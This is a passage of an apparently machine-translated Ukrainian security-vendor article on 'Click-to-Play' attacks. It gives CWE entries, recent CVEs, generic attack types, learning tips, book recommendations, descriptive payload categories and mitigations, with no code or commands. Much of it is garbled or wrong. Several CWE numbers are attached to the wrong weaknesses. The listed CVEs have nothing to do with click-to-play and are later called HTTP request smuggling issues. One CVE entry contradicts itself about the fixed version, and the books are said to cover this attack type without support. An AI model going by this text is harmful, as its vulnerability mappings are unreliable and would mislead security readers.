 38. CWE-943: Неправильна нейтралізація спеціальних елементів в логіці запиту даних: цей CWE пов'язаний з неправильною нейтралізацією спеціальних символів або елементів у запиті даних, що може дозволити зловмисникам виконувати ненавмисні команди або отримувати доступ до несанкціонованих даними.

 39. CWE-959: Використання захоплених хешей: цей CWE пов'язаний з використанням захоплених хешей паролів, які можуть бути використані для злому паролів або отримання несанкціонованого доступу до систем або програм.

 40. CWE-963: умова гонки в Switch: це умова гонки пов'язано з умовами перегонів в операторах switch, які можуть дозволити зловмисникам обійти засоби контролю безпеки або виконати ненавмисний код.

 41. CWE-1168: Неналежне контрольоване зміна динамічно визначаються атрибутів об'єкта: це CWE пов'язано з неналежним контролем атрибутів об'єкта, що може дозволити зловмисникам змінювати або обходити засоби контролю безпеки.

 42. CWE-1177: Використання рядка формату, що контролюється ззовні: цей CWE пов'язаний з використанням рядків формату, що контролюються ззовні, які можуть дозволити зловмисникам виконувати довільний код або отримувати доступ до несанкціонованих даними.

 43. CWE-1200: копіювання буфера без перевірки розміру вхідних даних ("Класичне переповнення буфера"): це CWE пов'язано з переповненням буфера, що може дозволити зловмисникам виконувати довільний код або аварійно завершувати роботу додатків.

 44. CWE-1224: Небезпечне зберігання конфіденційної інформації: Це CWE пов'язано з небезпечним зберіганням конфіденційної інформації, такої як паролі або ключі шифрування, які можуть бути використані зловмисниками для отримання несанкціонованого доступу до систем або програм.

Останні 10 CVE, пов'язаних з атаками "Натисніть, щоб грати"

CVE-2023-25171 Kiwi TCMS, система управління тестуванням з відкритим вихідним кодом, не накладає обмежень на швидкість у версіях 12.0. Це спрощує спроби атак типу "відмова в обслуговуванні" на сторінку відновлення пароля. Зловмисник потенційно може відправити велику кількість електронних листів, якщо він знає адреси електронної пошти користувачів TCMS Kiwi. Крім того, це може призвести до перевантаження ресурсів SMTP. Користувачі повинні оновитися до версії 12.0 або більш пізньої, щоб отримати виправлення. В якості можливих обхідних шляхів користувачі можуть встановити і налаштувати проксі-сервер з обмеженням швидкості перед Kiwi TCMS та / або налаштувати обмеження швидкості на своєму поштовому сервері, коли це можливо.

• CVE-2023-25156 Kiwi TCMS, система управління тестуванням з відкритим вихідним кодом, не накладає обмежень на швидкість у версіях 12.0. Це спрощує спроби атак методом грубої сили на сторінку входу в систему. Користувачі повинні оновитися до версії 12.0 або більш пізньої, щоб отримати виправлення. Як обхідного шляху користувачі можуть встановити і налаштувати проксі-сервер з обмеженням швидкості перед Kiwi TCMS.

• CVE-2023-24807 Undici - це клієнт HTTP / 1.1 для Node.js . До версії 5.19.1 методи `Headers.set ()` і `Headers.append()` були уразливі для атак типу "Відмова в обслуговуванні за регулярними виразами" (ReDoS), коли у функції передаються ненадійні значення. Це відбувається із-за неефективного регулярного виразу, який використовується для нормалізації значень у службовій функції `headerValueNormalize()`. Ця уразливість була виправлена у версії 5.19.1. Ніяких відомих обхідних шляхів не існує.

• CVE-2023-24443 Плагін підтримки Jenkins TestComplete 2.8.1 і більш ранніх версій не налаштовує свій аналізатор XML для запобігання атак XML external entity (XXE).

• CVE-2023-24441 Плагін Jenkins MSTest 1.0.0 і більш ранніх версій не налаштовує свій аналізатор XML для запобігання атак XML external entity (XXE).

• CVE-2023-24430 Плагін семантичного управління версіями Jenkins 1.14 і більш ранніх версій не налаштовує свій аналізатор XML для запобігання атак XML external entity (XXE).

• CVE-2023-23926 APOC (Awesome Procedures on Cypher) - це додаткова бібліотека для Neo4j. Уразливість XML External Entity (XXE), виявлена у процедурі apoc.import.graphml плагіна APOC core до версії 5.5.0 в базі даних Neo4j graph. Впровадження зовнішньої сутності XML (XXE) відбувається, коли аналізатор XML дозволяє вирішувати зовнішні сутності. Аналізатор XML, який використовується процедурою apoc.import.graphml, не був налаштований безпечним чином і тому дозволяв це. Зовнішні об'єкти можуть використовуватися для читання локальних файлів, відправлення HTTP-запитів та виконання атак типу "відмова в обслуговуванні" на додаток. Зловживання вразливістю XXE дозволило експертам з оцінки віддалено читати локальні файли. Хоча з урахуванням рівня привілеїв, якими володіли оцінювачі, це було обмежено однорядковими файлами. Завдяки можливості запису в базу даних будь-який файл міг бути прочитаний. Крім того, експерти відзначили, що при локальному тестуванні сервер може вийти з ладу із-за передачі неправильно відформатованого XML. Мінімальна версія, містить виправлення для цієї проблеми була, - 5.5.0. Ті, хто не може оновити бібліотеку, можуть керувати списком дозволених процедур, які можуть використовуватися у вашій системі.

• CVE-2023-23922 Уразливість була виявлена в Moodle, яка існує через недостатню очищення наданих користувачем даних в пошуку по блогу. Віддалений зловмисник може обманом змусити жертву перейти за спеціально створеною посиланню і виконати довільний HTML-код і скрипт в браузері користувача в контексті уразливого веб-сайту. Цей недолік дозволяє віддаленому зловмиснику виконувати атаки з використанням міжсайтових сценаріїв (XSS).

• CVE-2023-23921 Уразливість була виявлена в Moodle, яка існує через недостатню очищення наданих користувачем даних у деяких параметрах returnurl. Віддалений зловмисник може обманом змусити жертву перейти за спеціально створеною посиланню і виконати довільний HTML-код і скрипт в браузері користувача в контексті уразливого веб-сайту. Цей недолік дозволяє віддаленому зловмиснику виконувати атаки з використанням міжсайтових сценаріїв (XSS).

• CVE-2023-23856 У SAP BusinessObjects bi (інтерфейс веб–аналітики) - версія 430, деякі виклики повертають json з неправильним типом вмісту в заголовку відповіді. В результаті користувальницьке додаток, яке безпосередньо викликає jsp DHTML Web Intelligence, може бути вразливою для XSS-атак. При успішній експлуатації зловмисник може мати незначний вплив на цілісність програми.

Список CVE постійно оновлюється і доповнюється актуальний список всіх існуючих поширених загроз і вразливостей (CVE) для вразливостей, пов'язаних з контрабандою HTTP-запитів, можна знайти на офіційному веб-сайті CVE https://cve.mitre.org/

Список популярних експлойтів, пов'язаних з атаками "Натисніть, щоб відтворити"

Атаки типу Click-to-Play (CTP) можуть використовувати різні типи експлойтів, в тому числі пов'язані з веб-браузерами, плагінами та іншими уразливими програмного забезпечення.

 1. Міжсайтовий скриптінг (XSS) - XSS–атака використовується для впровадження шкідливого коду на веб-сторінку, яку переглядають інші користувачі. Це може призвести до крадіжці конфіденційної інформації, такої як паролі або дані кредитної картки.

 2. Підробка міжсайтових запитів (CSRF) - атака CSRF використовується для обману користувача з метою виконання дії на веб–сайті без його відома. Це може бути використано для виконання несанкціонованих транзакцій або зміни конфіденційних даних.

 3. SQL–ін'єкція - атака з використанням SQL-ін'єкції використовується для впровадження шкідливого коду в базу даних веб-додатки. Це може бути використано для крадіжки конфіденційної інформації, зміни даних або виконання несанкціонованих команд.

 4. Clickjacking – атака з використанням clickjacking використовується для обману користувача, щоб змусити його натиснути на кнопку або посилання, яка виконує ненавмисна дія. Це може бути використано для крадіжки конфіденційної інформації або виконання несанкціонованих дій на веб-сторінці.

 5. Шкідливе ПО – шкідливе ПЗ - це тип шкідливого програмного забезпечення, призначеного для зараження комп'ютера користувача і крадіжки конфіденційної інформації. Шкідливе ПЗ може бути доставлено за допомогою різних методів, включаючи CTP-атаки.

 6. Завантаження з диска - завантаження з диска використовується для завантаження та встановлення зловмисного програмного забезпечення на комп'ютер користувача без його відома. Це може бути зроблено за допомогою CTP-атак, шляхом обману користувача, змусивши його перейти за посиланням, або завантажити файл, що містить шкідливе ПО.

 7. Перехоплення сеансу – перехоплення сеансу використовується для отримання несанкціонованого доступу до сеансу користувача у веб-додатку. Це може бути використано для крадіжки конфіденційної інформації або виконання несанкціонованих дій у веб-додатку.

 8. Атака "Людина посередині" (MITM) - атака MITM використовується для перехоплення і зміни повідомлень між двома сторонами. Це може бути використано для крадіжки конфіденційної інформації або вчинення несанкціонованих дій.

 9. Експлойти нульового дня - експлойт нульового дня – це вразливість, яка ще не відома постачальника програмного забезпечення або широкої громадськості. Ці експлойти можуть бути використані для виконання високоспрямованих і складних атак, включаючи CTP-атаки.

 10. Атаки через водопій – атака через водопій використовується для націлювання на певну групу користувачів шляхом зараження веб-сайту, який, як відомо, вони відвідують. Це може бути використано для крадіжки конфіденційної інформації або виконання несанкціонованих дій на комп'ютерах користувачів.

Практикуйтеся у виявленні і використанні атак типу "Натисни, щоб грати"

Якщо ви зацікавлені в тому, щоб дізнатися більше про атаки "Натисніть, щоб відтворити", я б порекомендував наступне:

 1. Почніть з вивчення основ веб-безпеки і того, як працюють веб-додатки. Це дасть вам основу для розвитку, коли ви дізнаєтеся про атаки "Натисніть, щоб грати".

 2. Ознайомтеся з Burp Suite або іншим інструментом веб-проксі. Ці інструменти, необхідні для аналізу та управління веб-трафіком, що є критичним аспектом атак "Натисни, щоб грати".

 3. Вивчіть поширені сценарії атак та методи атак "Натисніть, щоб відтворити", такі як ті, які ми обговорювали раніше в цій розмові. Дізнайтеся, як виявляти уразливості і використовувати їх.

 4. Практикуйте свої навички безпечної і легальною середовищі. Ви можете використовувати навмисно вразливі веб-додатки або брати участь в програмах по виправленню помилок, щоб відточити свої навички.

 5. Будьте в курсі останніх досліджень і новин в області веб-безпеки. Відвідуйте конференції, читайте дослідницькі статті і слідкуйте за блогами і форумами, щоб дізнатися про нові методи і вразливості.

 6. Подумайте про отримання відповідних сертифікатів, таких як Certified Web Application Penetration Tester (CWAPT) або Offensive Security Certified Professional (OSCP), щоб продемонструвати свої знання та навички.

Книги з оглядом атак Click-to-Play

Ось кілька настійно рекомендованих книг з атак "Натисніть, щоб відтворити":

 1. "The Web Application hacker's Handbook: пошук і використання вразливостей в системі безпеки" Дэфидда Штуттарда і Маркуса Пінто – Ця книга являє собою всеосяжне керівництво з безпеки веб-додатків, включаючи атаки "Натисніть, щоб відтворити". У ньому розглядаються найбільш поширені уразливості, в тому числі ті, які можуть бути використані за допомогою CTP-атак, і наводяться докладні приклади і методи їх виявлення і використання.

 2. "Заплутана павутина: керівництво по забезпеченню безпеки сучасних веб–додатків" Міхала Залевські - В цій книзі досліджується складна мережа технологій і протоколів, що складають сучасні веб-додатки, включаючи уразливості, які можуть бути використані за допомогою атак "Натисніть, щоб грати". У ньому містяться практичні рекомендації щодо захисту веб-додатків від широкого спектру атак.

 3. "Освоєння сучасного тестування на проникнення в Інтернет", автор Прахар Прасад – Ця книга охоплює широкий спектр тем безпеки веб-додатків, включаючи атаки "Натисніть, щоб відтворити". У ньому міститься докладне керівництво по виявленню і використанню уразливостей у веб-додатках, а також наводяться реальні приклади і тематичні дослідження.

 4. "Black Hat Python: програмування на Python для хакерів і пентестеров" Джастіна Сейтца – Ця книга присвячена використанню Python для тестування та експлуатації безпеки веб-додатків, включаючи атаки з використанням Click-to-Play. Він охоплює цілий ряд тем, від базової безпеки веб-додатків до більш складних тем, таких як зворотний інжиніринг та розробка експлойтів.

 5. "Основи веб–злому: інструменти і методи для атаки в Інтернеті" Джоша Паулі - Ця книга являє собою введення в безпеку веб-додатків, включаючи атаки "Натисніть, щоб відтворити", і охоплює основні інструменти та методи, що використовуються хакерами для використання уразливостей у веб-додатках.

Всі ці книги настійно рекомендуються всім, хто зацікавлений в отриманні додаткової інформації про атаки "Натисніть, щоб відтворити" і безпеки веб-додатків в цілому. Вони забезпечують міцну основу знань та практичних рекомендацій щодо виявлення і використання уразливостей у веб-додатках.

Список корисних навантажень для атак "Натисніть, щоб відтворити"

Корисне навантаження для атак типу Click-to-Play (CTP) може змінюватись в залежності від конкретної використовуваної уразливості і мети зловмисника.

 1. Доставка шкідливих програм: зловмисники можуть використовувати CTP-атаки для доставки шкідливих програм в систему жертви, таких як трояни, бекдори і кейлогери.

 2. Крадіжка облікових даних: CTP-атаки можуть використовуватися для крадіжки облікових даних користувачів, таких як імена користувачів і паролі, шляхом перехоплення форм входу в систему або фішингових атак.

 3. Міжсайтовий скриптінг (XSS): CTP-атаки можуть використовуватися для виконання корисних навантажень XSS, які дозволяють зловмисникам красти файли cookie, впроваджувати шкідливі скрипти або перенаправляти жертву на шкідливий веб-сайт.

 4. Підробка міжсайтових запитів (CSRF): зловмисники можуть використовувати CTP-атаки для виконання CSRF-атак, обманом змусити жертву виконувати несанкціоновані дії на вразливому веб-сайті.

 5. Віддалене виконання коду (RCE): CTP-атаки також можуть використовуватися для віддаленого виконання коду в системі жертви, дозволяючи зловмиснику отримати контроль над системою або підвищити привілеї.

 6. DoS-атаки: Зловмисники можуть використовувати CTP-атаки для запуску атак типу "відмова в обслуговуванні" (DoS), які споживають системні ресурси, призводять до збоїв додатків або перевантажують мережу жертви.

 7. Атаки з перенаправленням: CTP-атаки можуть використовуватися для перенаправлення жертви на шкідливий веб-сайт, фішинговий сайт або інші типи небажаного контенту.

 8. Clickjacking: зловмисники можуть використовувати CTP-атаки для здійснення атак з допомогою clickjacking, приховуючи клікабельний елемент на веб-сторінці і змушуючи жертву натискати на нього несвідомо.

 9. Шкідлива реклама: зловмисники можуть використовувати CTP-атаки для впровадження шкідливої реклами на законні веб-сайти, що може призвести до скачування через інтернет або інших типів атак.

 10. Крадіжка інформації: CTP-атаки можуть використовуватися для крадіжки конфіденційної інформації, такої як номери кредитних карт, номери соціального страхування або інші особисті дані, шляхом перехоплення веб-запитів або використання вразливостей в коді веб-сайту.

Пом'якшення наслідків та способи захисту від атак "Натисни, щоб грати"

Існує кілька способів пом'якшення та захисту від атак типу Click-to-Play (CTP):

 1. Підтримуйте своє програмне забезпечення в актуальному стані: переконайтеся, що ваша операційна система, веб-браузер і оновлені плагіни останніми виправленнями безпеки.

 2. Використовуйте рішення для забезпечення безпеки: впроваджуйте рішення для забезпечення безпеки, такі як антивірусне, антивірусне та фішінговий програмне забезпечення, для виявлення і запобігання CTP-атак.

 3. Відключити автоматичне відтворення: вимкніть автоматичне відтворення відео, зображень та іншого вмісту на вашому веб-браузері та поштовому клієнті.

 4. Використовуйте блокувальники реклами: використовуйте блокувальники реклами, щоб запобігти завантаження шкідливої реклами на ваш комп'ютер.

 5. Просвітництво користувачів: Інформуйте користувачів про небезпеку переходу з невідомих посиланнями або завантаження підозрілих вкладень.

 6. Використовуйте click-to-play: використовуйте функцію click-to-play в вашому веб-браузері, щоб запобігти автоматичний запуск плагінів.

 7. Впровадити політику безпеки контенту (CSP): впровадити CSP для запобігання завантаження шкідливих скриптів і контенту з ненадійних джерел.

 8. Використання пісочниці: використовуйте пісочницю для запуску плагіна веб-браузера в окремому процесі з обмеженим доступом до системі.

 9. Регулярно проводите тестування безпеки: регулярно перевіряйте свою систему на наявність вразливостей і слабких місць у системі безпеки і робіть відповідні дії для усунення будь-яких проблем.

Реалізуючи ці заходи, ви можете значно зменшити ризик стати жертвою атак типу "Натисни, щоб грати" і забезпечити безпеку своїх систем і даних.

Висновок

Атаки типу Click-to-Play (CTP) представляють серйозну загрозу для комп'ютерних систем і можуть використовуватися зловмисниками для отримання несанкціонованого доступу, крадіжки конфіденційних даних і порушення безпеки системи. Ці атаки можуть бути здійснені з використанням різних методів та інструментів і можуть бути націлені на різні компоненти системи. Приватним особам та організаціям важливо зробити кроки для захисту себе від CTP-атак за допомогою методів пом'якшення наслідків, таких як оновлення програмного забезпечення, впровадження політик безпеки і використання засобів забезпечення безпеки. Крім того, фахівцям з безпеки важливо бути в курсі новітніх методів та інструментів CTP-атак, а також постійно тестувати й вдосконалювати свої засоби захисту від цих атак.

Інші Послуги

Готові до безпеки?

зв'язатися з нами